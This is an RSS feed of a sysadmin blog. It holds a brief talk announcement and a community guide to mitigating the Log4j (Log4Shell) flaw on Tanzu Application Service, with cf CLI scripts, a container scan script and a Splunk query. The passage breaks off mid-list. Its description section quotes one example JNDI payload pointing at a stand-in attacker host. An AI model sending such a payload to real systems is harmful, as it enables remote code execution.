<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>The Fluffy Admin</title>
	<atom:link href="https://thefluffyadmin.net/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>https://thefluffyadmin.net</link>
	<description>The life and times of the Fluffy SysAdmin</description>
	<lastBuildDate>Mon, 11 Apr 2022 16:56:12 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0</generator>
<site xmlns="com-wordpress:feed-additions:1">7260995</site>	<item>
		<title>Spoke at the VMUGNL 2021</title>
		<link>https://thefluffyadmin.net/?p=1731</link>
					<comments>https://thefluffyadmin.net/?p=1731#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Mon, 11 Apr 2022 16:56:12 +0000</pubDate>
				<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[kubernetes]]></category>
		<category><![CDATA[tanzu kubernetes grid]]></category>
		<category><![CDATA[tkg]]></category>
		<category><![CDATA[tkgi]]></category>
		<category><![CDATA[tkgm]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1731</guid>

					<description><![CDATA[VMUGNL - Differences between TKG versions. Late last year, I spoke at the VMUGNL about the differences between the TKG versions (TKGi, TKGm and TKGs) as they existed at the end of 2021. The talk is in Dutch (which is quite rare for me).]]></description>
										<content:encoded><![CDATA[<h1>VMUGNL - Differences between TKG versions</h1>
<p>Late last year, I spoke at the <a href="https://vmugnl.nl/">VMUGNL</a> about the differences between the TKG versions (TKGi, TKGm and TKGs) as they existed at the end of 2021.</p>
<p>The talk is in Dutch (which is quite rare for me).</p>
<p><iframe class="youtube-player" width="640" height="360" src="https://www.youtube.com/embed/N3Cv1CyF-c4?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-US&#038;autohide=2&#038;wmode=transparent" allowfullscreen="true" style="border:0;" sandbox="allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox"></iframe></p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1731</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2022/04/Pasted.png</image><post-id xmlns="com-wordpress:feed-additions:1">1731</post-id>	</item>
		<item>
		<title>Log4j Security Vulnerabilities CVE-2021-44228 &#8211; Mitigation Strategies for Tanzu Application Services Operators</title>
		<link>https://thefluffyadmin.net/?p=1712</link>
					<comments>https://thefluffyadmin.net/?p=1712#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Wed, 15 Dec 2021 19:08:25 +0000</pubDate>
				<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[vexpert]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[log4j]]></category>
		<category><![CDATA[log4shell]]></category>
		<category><![CDATA[Pivotal]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[TAS]]></category>
		<category><![CDATA[tkgi]]></category>
		<category><![CDATA[vanguard]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1712</guid>

					<description><![CDATA[This post was created by the VMware Tanzu Vanguard community. (https://tanzu.vmware.com/vanguard) This community is a small group of VMware Tanzu users, who came over from the Pivotal community, and represent some of VMware's largest and coolest TAS (Tanzu Application Services) and TKGI (Tanzu Kubernetes Grid Integrated) customers and partners. This community is led by the <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1712">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p>This post was created by the VMware Tanzu Vanguard community. (<a href="https://tanzu.vmware.com/vanguard">https://tanzu.vmware.com/vanguard</a>)<br />
This community is a small group of VMware Tanzu users, who came over from the Pivotal community, and represent some of VMware's largest and coolest TAS (Tanzu Application Services) and TKGI (Tanzu Kubernetes Grid Integrated) customers and partners. This community is led by the incomparable Brian Chang --&gt; <a href="https://twitter.com/techadvoguy">https://twitter.com/techadvoguy</a><br />
While I am mentioned in the credits, I really only contributed the xkcd image :p</p>
<p>------------</p>
<p><span style="font-weight: 400;">Log4j Security Vulnerabilities CVE-2021-44228 - Mitigation Strategies for TAS Operators</span></p>
<p><span style="font-weight: 400;">By the </span><a href="https://tanzu.vmware.com/vanguard"><span style="font-weight: 400;">Tanzu Vanguard</span></a><span style="font-weight: 400;"> community - key contributors: Simmy Xavier, Charles Lester, Juergen Sussner, Jonathan Regehr &amp; Robert Kloosterhuis</span></p>
<p>&nbsp;</p>
<p><b>Summary Brief:</b></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Apache Log4j is a very widely used logging library for Java. A vulnerability named Log4Shell has been identified in it and is tracked officially as CVE-2021-44228 (with a second one tracked as CVE-2021-45046). The vulnerability allows RCE (Remote Code Execution) attacks, which makes exploitation especially dangerous. Attackers could use it to run malicious code for crypto mining or information extraction. There are reports of increased scanning across the Internet to identify vulnerable systems and infect them with malware or ransomware. The issue was discovered as early as Dec 1st by Chen Zhaojun of the Alibaba Cloud Security Team and affects log4j-core v2.0 to v2.14.1. Apache released version v2.15.0 as of Dec 5 and version v2.16.0 as of Dec 14. The vulnerability has a severity rating of 10 out of 10 and has been treated as a zero-day vulnerability since Dec 10, when it was publicly disclosed.</span></p>
<p>&nbsp;</p>
<h1><span style="font-weight: 400;">Description: </span></h1>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">If you have a system that uses log4j and you can get that system to log a string containing a JNDI lookup, such as ${jndi:ldap://attacker.example/a}, log4j will resolve the lookup while writing the message. That lookup can load and execute code supplied by the attacker's server.</span></p>
<p><span style="font-weight: 400;">The simplest example is a Minecraft server: it logs any chat messages that are sent, so if you put a malicious string in a chat message, log4j will process it as it logs the message.</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">The TAS platform itself uses a vulnerable Log4j library in the TAS tile and in some of the other tiles. Apps built with the Java buildpack may also pull in vulnerable libraries.</span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">CISA is not able to confirm that merely using a newer JRE is sufficient for protection. See the discussion on the oss-security mailing list at </span><a href="http://www.openwall.com/lists/oss-security/2021/12/10/3"><span style="font-weight: 400;">http://www.openwall.com/lists/oss-security/2021/12/10/3</span></a><span style="font-weight: 400;">. In the meantime, it has also been confirmed that a modified version of this exploit is not restricted to a specific JVM version.</span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Full remediation requires the use of log4j &gt;= 2.16.0. The mitigation strategies merely reduce the attack surface area but do not fully protect against the threat.</span></p>
<p>&nbsp;</p>
<h1><span style="font-weight: 400;">Mitigation strategies for TAS </span></h1>
<h3><b>For systems running log4j &gt;= 2.10.0 (thanks, Simmy Xavier!): </b></h3>
<ol>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">One approach is to set the </span><span style="font-weight: 400;">LOG4J_FORMAT_MSG_NO_LOOKUPS</span><span style="font-weight: 400;"> variable in the running environment variable group</span><span style="font-weight: 400;">, reflected in example (1) below. The limitation to this approach is that “</span><span style="font-weight: 400;">Any user-defined variable takes precedence over environment variables provided by these groups.” </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Another approach is to place the variable in the environment of every app, reflected in example (2) below. The limitation to this approach is that a subsequent restage of the application will cause the variable to be lost.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Instead of setting the env variable </span><span style="font-weight: 400;">LOG4J_FORMAT_MSG_NO_LOOKUPS</span><span style="font-weight: 400;">, you can also add -Dlog4j2.formatMsgNoLookups=true to the JAVA_OPTS variable.</span></li>
</ol>
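<p><span style="font-weight: 400;">For the JAVA_OPTS route, an app may already carry other JVM options, so the flag should be appended rather than overwrite them. A minimal sketch, assuming a plain space-separated JAVA_OPTS value; add_no_lookups_flag is a hypothetical helper name, not part of the cf CLI:</span></p>

```shell
# Append the Log4j flag to an existing JAVA_OPTS value, but only once.
# add_no_lookups_flag is a hypothetical helper, not a cf CLI command.
add_no_lookups_flag() {
  current="$1"
  flag="-Dlog4j2.formatMsgNoLookups=true"
  if [ -z "$current" ]; then
    # No existing options: the flag is the whole value.
    printf '%s\n' "$flag"
    return 0
  fi
  case " $current " in
    *" $flag "*) printf '%s\n' "$current" ;;        # flag already present
    *)           printf '%s\n' "$current $flag" ;;  # keep old options, add flag
  esac
}

# Example with a made-up existing value.
add_no_lookups_flag "-Xmx512m"
```

<p><span style="font-weight: 400;">The result could then be passed to cf set-env for the JAVA_OPTS variable of an app, followed by a restart as in the examples further down.</span></p>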
<h3><b>For any systems running log4j 2.*</b></h3>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">The more comprehensive mitigation strategy is to remove the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)</span></p>
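<p><span style="font-weight: 400;">After running the zip command it is worth confirming that the class is really gone. A small sketch that inspects an archive listing read from stdin; jndi_lookup_status is a hypothetical helper name, and the listing format is assumed to contain the full class path on one line, as unzip -l prints it:</span></p>

```shell
# Reads an archive listing on stdin (for example from `unzip -l some.jar`)
# and reports whether the JndiLookup class is still packaged.
# jndi_lookup_status is a hypothetical helper name.
jndi_lookup_status() {
  if grep -q 'org/apache/logging/log4j/core/lookup/JndiLookup\.class'; then
    echo "present"
  else
    echo "removed"
  fi
}

# Example with a made-up single-line listing.
printf '%s\n' "org/apache/logging/log4j/core/lookup/JndiLookup.class" | jndi_lookup_status
```

<p><span style="font-weight: 400;">In practice the input would come from something like unzip -l on the patched log4j-core jar, piped into the function.</span></p>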
<p>&nbsp;</p>
<h3><b>For older 1.x versions:</b></h3>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Although 1.x does not seem to be affected by this, it is an old version that has been out of support for a long time and may be vulnerable to various other problems. Log4j 1.x should therefore also be considered for an update. Depending on the app, this can be achieved fairly simply by using the API bridge as described here: </span><a href="https://logging.apache.org/log4j/2.x/manual/migration.html"><span style="font-weight: 400;">https://logging.apache.org/log4j/2.x/manual/migration.html</span></a></p>
<p>&nbsp;</p>
<h3><b>Example mitigation strategies for TAS running log4j &gt;= 2.10.0 (thanks to Simmy Xavier):</b><span style="font-weight: 400;"> </span></h3>
<p>&nbsp;</p>
<ol>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Set the running environmental variable group (see </span><a href="https://docs.cloudfoundry.org/devguide/deploy-apps/environment-variable.html#evgroups"><span style="font-weight: 400;">https://docs.cloudfoundry.org/devguide/deploy-apps/environment-variable.html#evgroups</span></a><span style="font-weight: 400;">) </span><span style="font-weight: 400;">(restart requires CLI &gt;= 7) (note: if you have any </span><b>existing</b><span style="font-weight: 400;"> running environmental variables, then you’ll need to add those into the </span><i><span style="font-weight: 400;">srevg</span></i><span style="font-weight: 400;"> command, as the command expects to receive all the variables for the group, i.e., the command will set the revg to only what you specify in the command)</span><span style="font-weight: 400;">:</span></li>
</ol>
<p>&nbsp;</p>
<pre><span style="font-weight: 400;">cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'</span>

<span style="font-weight: 400;">cf restart &lt;app-name&gt; --strategy rolling</span>

</pre>
<p><span style="font-weight: 400;">2. Set the environment variable for a particular app (restart requires CLI &gt;= 7):</span></p>
<pre>

<span style="font-weight: 400;">cf set-env &lt;app-name&gt; LOG4J_FORMAT_MSG_NO_LOOKUPS true</span>

<span style="font-weight: 400;">cf restart &lt;app-name&gt; --strategy rolling</span>

</pre>
<p><span style="font-weight: 400;">3. Script to loop through all apps in a space, apply the change in (2) and restart the app (restart requires CLI &gt;= 7):</span></p>
<p>&nbsp;</p>
<pre><span style="font-weight: 400;">cf apps | sed -n </span><span style="font-weight: 400;">'</span><span style="font-weight: 400;">4,$p</span><span style="font-weight: 400;">'</span><span style="font-weight: 400;">| awk </span><span style="font-weight: 400;">'</span><span style="font-weight: 400;">{print $1}</span><span style="font-weight: 400;">'</span><span style="font-weight: 400;"> | while read appName</span>

<span style="font-weight: 400;">do cf set-env $appName LOG4J_FORMAT_MSG_NO_LOOKUPS true; </span>

<span style="font-weight: 400;">cf restart $appName --strategy rolling</span>

<span style="font-weight: 400;">done</span>

</pre>
<p><span style="font-weight: 400;">4. Script to apply the change in (1), then loop through every app in every space in every org, and restart the app (restart requires CLI &gt;= 7) (you may want to edit the loops to exclude certain orgs, spaces, or apps):</span></p>
<p>&nbsp;</p>
<pre># Applies the fix, then runs through every space in every org and restarts every app.

# Note that “Any user-defined variable takes precedence over environment variables provided by these groups.”

cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'

for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')

  do 

    cf t -o $org 1&gt;/dev/null 2&gt;&amp;1

    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')

      do cf t -o $org -s $space 1&gt;/dev/null 2&gt;&amp;1

        rc=$?

        if [[ $rc -eq 0 ]]

          then

               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')

               for app in $apps

                  do cf restart $app --strategy rolling

                  done

          else echo "cf t -o $org -s $space failed"

        fi

      done

  done</pre>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">5. Script to loop through every app in every space in every org, apply the change in (2) and restart the app (restart requires CLI &gt;= 7) (you may want to edit the loops to exclude certain orgs, spaces, or apps):</span></p>
<p>&nbsp;</p>
<pre><span style="font-weight: 400;"># Runs through every space in every org, applies the (temporary) fix, and restarts the app.</span>

<span style="font-weight: 400;">for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">  do </span>

<span style="font-weight: 400;">    cf t -o $org 1&gt;/dev/null 2&gt;&amp;1</span>

<span style="font-weight: 400;">    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">      do cf t -o $org -s $space 1&gt;/dev/null 2&gt;&amp;1</span>

<span style="font-weight: 400;">        rc=$?</span>

<span style="font-weight: 400;">        if [[ $rc -eq 0 ]]</span>

<span style="font-weight: 400;">          then</span>

<span style="font-weight: 400;">               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">               for app in $apps</span>

<span style="font-weight: 400;">                  do cf set-env $app LOG4J_FORMAT_MSG_NO_LOOKUPS true</span>

<span style="font-weight: 400;">                     cf restart $app </span><span style="font-weight: 400;">--</span><span style="font-weight: 400;">strategy rolling</span>

<span style="font-weight: 400;">                  done</span>

<span style="font-weight: 400;">          else echo "cf t -o $org -s $space failed"</span>

<span style="font-weight: 400;">        fi</span>

<span style="font-weight: 400;">      done</span>

<span style="font-weight: 400;">  done</span>


</pre>
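<p><span style="font-weight: 400;">All of the loops above depend on the same filter, sed -n '4,$p' piped into awk '{print $1}', to turn cf output into a list of names. A sketch of what that filter does, run against sample text shaped like cf CLI v7 output. The org, space, user and app names are made up, and the header layout is an assumption that may differ between CLI versions, so check it against your own foundation:</span></p>

```shell
# Same filter as in the scripts above: skip the first three lines
# (status line, blank line, column header) and keep the first column.
# list_names is a hypothetical helper name.
list_names() {
  sed -n '4,$p' | awk '{print $1}'
}

# Sample text shaped like `cf apps` output; all names are invented.
sample_output='Getting apps in org demo-org / space dev as admin...

name      requested state   processes   routes
billing   started           web:2/2     billing.example.com
orders    stopped           web:0/1     orders.example.com'

# Prints one app name per line.
printf '%s\n' "$sample_output" | list_names
```

<p><span style="font-weight: 400;">If the number of header lines ever changes, the 4 in the sed expression is the only thing that needs adjusting.</span></p>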
<p><span style="font-weight: 400;">Hint:</span></p>
<p><span style="font-weight: 400;">When using cf restart app --strategy rolling, the rolling restart relies on a TAS feature called deployments, which starts new app instances while the old ones are still running. This needs some spare org quota; in other words, a rolling restart will fail in an org with no quota left.</span></p>
<p>&nbsp;</p>
<h1><span style="font-weight: 400;">Apache mitigation recommendations</span></h1>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Apache's recommendations, located at</span> <a href="https://logging.apache.org/log4j/2.x/security.html"><span style="font-weight: 400;">https://logging.apache.org/log4j/2.x/security.html</span></a><span style="font-weight: 400;">, </span><span style="font-weight: 400;">depending on the version of log4j2, are:</span></p>
<table>
<tbody>
<tr>
<td><b>Log4j version</b></td>
<td><b>Mitigation Plan</b></td>
</tr>
<tr>
<td><span style="font-weight: 400;">2.16.0</span></td>
<td><span style="font-weight: 400;">Nothing</span></td>
</tr>
<tr>
<td><span style="font-weight: 400;">2.15.0</span></td>
<td><span style="font-weight: 400;">Upgrade to 2.16.0</span></td>
</tr>
<tr>
<td><span style="font-weight: 400;">2.10.0 - 2.14.1</span></td>
<td>
<p><span style="font-weight: 400;">Upgrade to 2.16.0</span></p>
<p><span style="font-weight: 400;">OR</span></p>
<p><span style="font-weight: 400;">Set environment variable "LOG4J_FORMAT_MSG_NO_LOOKUPS" to "true"</span></p>
<p><span style="font-weight: 400;">OR</span></p>
<p><span style="font-weight: 400;">Set system property "log4j2.formatMsgNoLookups" to "true"</span></p>
</td>
</tr>
<tr>
<td><span style="font-weight: 400;">2.0 - 2.9.1</span></td>
<td>
<p><span style="font-weight: 400;">Upgrade to 2.16.0</span></p>
<p><span style="font-weight: 400;">OR</span></p>
<p><span style="font-weight: 400;">Remove JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</span></p>
</td>
</tr>
<tr>
<td><span style="font-weight: 400;">1.x</span></td>
<td><span style="font-weight: 400;">Log4j 1.x is no longer supported at all, and a bug related to Log4Shell, dubbed CVE-2021-4104, exists in this version</span></td>
</tr>
</tbody>
</table>
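<p><span style="font-weight: 400;">The table above can be read as a small decision function. The sketch below encodes it in shell; mitigation_for is a hypothetical helper name, it only understands plain MAJOR.MINOR[.PATCH] version strings, and treating anything at or above 2.16 like the 2.16.0 row is an assumption rather than something the table states:</span></p>

```shell
# Maps a log4j-core version string to the mitigation from the table above.
# mitigation_for is a hypothetical helper; suffixes such as "-beta9" are ignored.
mitigation_for() {
  version="${1%%-*}"        # drop any "-suffix"
  major="${version%%.*}"    # text before the first dot
  rest="${version#*.}"      # text after the first dot
  minor="${rest%%.*}"       # second version component
  case "$major" in
    1) echo "no longer supported (see CVE-2021-4104)"; return 0 ;;
    2) ;;
    *) echo "unknown version"; return 0 ;;
  esac
  case "$minor" in
    ''|*[!0-9]*) echo "unknown version"; return 0 ;;
  esac
  if [ "$minor" -ge 16 ]; then
    # Assumption: versions above 2.16 are treated like 2.16.0.
    echo "nothing to do"
  elif [ "$minor" -eq 15 ]; then
    echo "upgrade to 2.16.0"
  elif [ "$minor" -ge 10 ]; then
    echo "upgrade to 2.16.0, or set LOG4J_FORMAT_MSG_NO_LOOKUPS=true"
  else
    echo "upgrade to 2.16.0, or remove JndiLookup.class from the classpath"
  fi
}

mitigation_for 2.14.1
```

<p><span style="font-weight: 400;">A function like this could be fed the versions found by a container scan to get a first triage list per app.</span></p>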
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Several VMware products, along with products from other vendors, use this popular framework, and the vendors are actively working on releasing a workaround and/or a patch. The impacted VMware products and the status of their patches and workarounds are posted in the Security Advisory located at </span><a href="https://www.vmware.com/security/advisories/VMSA-2021-0028.html"><span style="font-weight: 400;">https://www.vmware.com/security/advisories/VMSA-2021-0028.html</span></a></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Based on the blog on Spring.io (</span><a href="https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot"><span style="font-weight: 400;">https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot</span></a><span style="font-weight: 400;">), Spring Boot users are only impacted if they have switched the default logging system to log4j2.</span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Until a patch can be applied across the TAS foundation, the workaround is to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. This can be done at a global level or at an app level, but in either case it requires a restart to take effect. </span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Setting at Global level - </span><strong>cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'</strong></p>
<p><span style="font-weight: 400;">Setting at an App Level - </span><strong>cf set-env &lt;app-name&gt; LOG4J_FORMAT_MSG_NO_LOOKUPS true</strong></p>
<p><span style="font-weight: 400;">Restart the app instances in a rolling fashion (require cf cli v7+) - </span><strong>cf restart &lt;app-name&gt; --strategy rolling</strong></p>
<p><span style="font-weight: 400;">Validating the change - </span><strong>cf env &lt;app-name&gt; | grep LOG4J</strong></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Other useful scripts</span></p>
<p>&nbsp;</p>
<pre><span style="font-weight: 400;"># Set the environment variable (all apps in a space)</span>

<span style="font-weight: 400;">cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf set-env $appName LOG4J_FORMAT_MSG_NO_LOOKUPS true; done</span>

<span style="font-weight: 400;"># Perform a rolling restart (all apps in a space)</span>

<span style="font-weight: 400;">cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf restart $appName --strategy rolling; done</span>

<span style="font-weight: 400;"># Validate (all apps in a space)</span>

<span style="font-weight: 400;">cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf env $appName | grep LOG4J ; done</span>
</pre>
<h1><span style="font-weight: 400;">How TAS as immutable infrastructure helps</span></h1>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Despite all the mitigation strategies, there is still a risk that some remote code got dropped into a running container. To cope with that proactively, you can use the TAS feature where containers are recreated from an immutable source image (the droplet). So why not run the restart scripts above on a regular basis, to constantly wipe out anything that got into a container? </span></p>
<h1><span style="font-weight: 400;">Monitoring app changes on TAS</span></h1>
<p><span style="font-weight: 400;">Patching TAS is essential, and having apps secured should be the first priority. But you may also want to know how your apps are behaving and whether they carry a vulnerable version within their containers. To find out, you can set up a search job to investigate all running containers. </span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">The following script can be run as a task in TAS:</span></p>
<pre><span style="font-weight: 400;">API=`echo $VCAP_APPLICATION | jq -r ".cf_api"`</span>




<span style="font-weight: 400;">cf login -a $API -u $USER -p $PASSWD -o dummyorg -s dummyspace</span>

<span style="font-weight: 400;">for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">  do</span>

<span style="font-weight: 400;">    cf t -o $org 1&gt;/dev/null 2&gt;&amp;1</span>

<span style="font-weight: 400;">    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">      do cf t -o $org -s $space 1&gt;/dev/null 2&gt;&amp;1</span>

<span style="font-weight: 400;">        rc=$?</span>

<span style="font-weight: 400;">        if [ $rc -eq 0 ]</span>

<span style="font-weight: 400;">          then</span>

<span style="font-weight: 400;">               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')</span>

<span style="font-weight: 400;">               for app in $apps</span>

<span style="font-weight: 400;">                  do </span>

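<span style="font-weight: 400;">                     # capture the exit code of cf ssh itself, then flatten the output</span>

<span style="font-weight: 400;">                     log4jversion=`cf ssh "$app" -c "cd /app; find -iname '*$PATTERN*'"`</span>

<span style="font-weight: 400;">                     rc=$?</span>

<span style="font-weight: 400;">                     log4jversion=`printf '%s' "$log4jversion" | tr '\n' ' '`</span>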

<span style="font-weight: 400;">                     if [ $rc -eq 0 ]</span>

<span style="font-weight: 400;">                     then</span>

<span style="font-weight: 400;">                        if [ -z "$log4jversion" ]</span>

<span style="font-weight: 400;">                            then</span>

<span style="font-weight: 400;">                                echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=not found"</span>

<span style="font-weight: 400;">                            else</span>

<span style="font-weight: 400;">                                echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=$log4jversion"</span>

<span style="font-weight: 400;">                        fi </span>

<span style="font-weight: 400;">                     else </span>

<span style="font-weight: 400;">                        echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=not-ssh-able"</span>

<span style="font-weight: 400;">                     fi</span>

<span style="font-weight: 400;">                  done</span>

<span style="font-weight: 400;">          else echo "cf t -o $org -s $space failed"</span>

<span style="font-weight: 400;">        fi</span>

<span style="font-weight: 400;">      done</span>

<span style="font-weight: 400;">  done</span></pre>
<p><span style="font-weight: 400;">This script will ssh into every container running on TAS and search its filesystem for log4j versions. You can utilize the TAS scheduler (</span><a href="https://network.pivotal.io/products/p-scheduler/"><span style="font-weight: 400;">https://network.pivotal.io/products/p-scheduler/</span></a><span style="font-weight: 400;">) to run this task once a day.</span></p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195502.jpg?ssl=1"><img data-recalc-dims="1" fetchpriority="high" decoding="async" class="alignnone size-full wp-image-1716" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195502.jpg?resize=494%2C289&#038;ssl=1" alt="" width="494" height="289" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195502.jpg?w=494&amp;ssl=1 494w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195502.jpg?resize=300%2C176&amp;ssl=1 300w" sizes="(max-width: 494px) 100vw, 494px" /></a></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">The Log output can be forwarded to any Log Management System which allows you to create a “real time” dashboard.</span></p>
<p><span style="font-weight: 400;">If you use Splunk, the query would be:</span></p>
<pre>
<span style="font-weight: 400;">index=&lt;TAS_FOUNDATION&gt; cf_app_name=AdminScripts event_type=LogMessage </span>

<span style="font-weight: 400;">| rex field=msg  "ORG=(?&lt;orgname&gt;.*)   SPACE=(?&lt;spacename&gt;.*)   APP=(?&lt;appname&gt;.*) LOG4JVERSION=(?&lt;testresult&gt;.*)" </span>

<span style="font-weight: 400;">| eval files=split(testresult," ")</span>

<span style="font-weight: 400;">| rex field=files "log4j-core-(?&lt;log4jversion&gt;.*).jar"</span>

<span style="font-weight: 400;">| eval log4jversion=mvjoin (mvsort(mvdedup(log4jversion)), ",")</span>

<span style="font-weight: 400;">| table orgname, spacename, appname, log4jversion, files</span>

<span style="font-weight: 400;">| sort log4jversion desc</span></pre>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">This creates a nice visualization like this</span></p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?ssl=1"><img data-recalc-dims="1" decoding="async" class="alignnone size-full wp-image-1718" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?resize=640%2C103&#038;ssl=1" alt="" width="640" height="103" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?w=1088&amp;ssl=1 1088w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?resize=300%2C48&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?resize=1024%2C165&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/12/Screenshot-2021-12-15-195737.jpg?resize=768%2C124&amp;ssl=1 768w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><span style="font-weight: 400;">With this, you get an overview of which app uses which version. As you can see in this example, there are sometimes “hidden” versions, or more than one version within an app, because agents like the AppDynamics Agent bring their own copy of the library.</span></p>
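<p><span style="font-weight: 400;">If you have no Splunk at hand, the version extraction that the query does with rex, mvdedup and mvjoin can be approximated in shell before the line is logged. A rough sketch, assuming the space-separated path list the scan script produces; extract_log4j_versions is a hypothetical helper name and the paths in the example are made up:</span></p>

```shell
# Pulls log4j-core version numbers out of a space-separated list of
# paths and prints them deduplicated, sorted and comma-joined.
# extract_log4j_versions is a hypothetical helper name.
extract_log4j_versions() {
  tr ' ' '\n' |
    sed -n 's/.*log4j-core-\(.*\)\.jar$/\1/p' |
    sort -u |
    paste -sd, -
}

# Example input with invented paths; log4j-api jars are ignored on purpose.
echo "./BOOT-INF/lib/log4j-core-2.14.1.jar ./agent/lib/log4j-core-2.11.0.jar ./BOOT-INF/lib/log4j-api-2.14.1.jar" |
  extract_log4j_versions
```

<p><span style="font-weight: 400;">The sort here is a plain text sort, which is good enough for spotting duplicates but not for ordering versions numerically.</span></p>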
<p>&nbsp;</p>
<h1><span style="font-weight: 400;">Patching apps the hard way…</span></h1>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">You may also face apps that refuse to be patched because there is no source code available or no pipeline or for whatever reason. In this case, you can try the following approach to patch such apps.</span></p>
<p>&nbsp;</p>
<ol>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf app vulnerableApp --guid</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
<pre><span style="font-weight: 400;">cf curl /v3/apps/&lt;guid&gt;/packages</span></pre>
</li>
<li style="font-weight: 400;" aria-level="1">
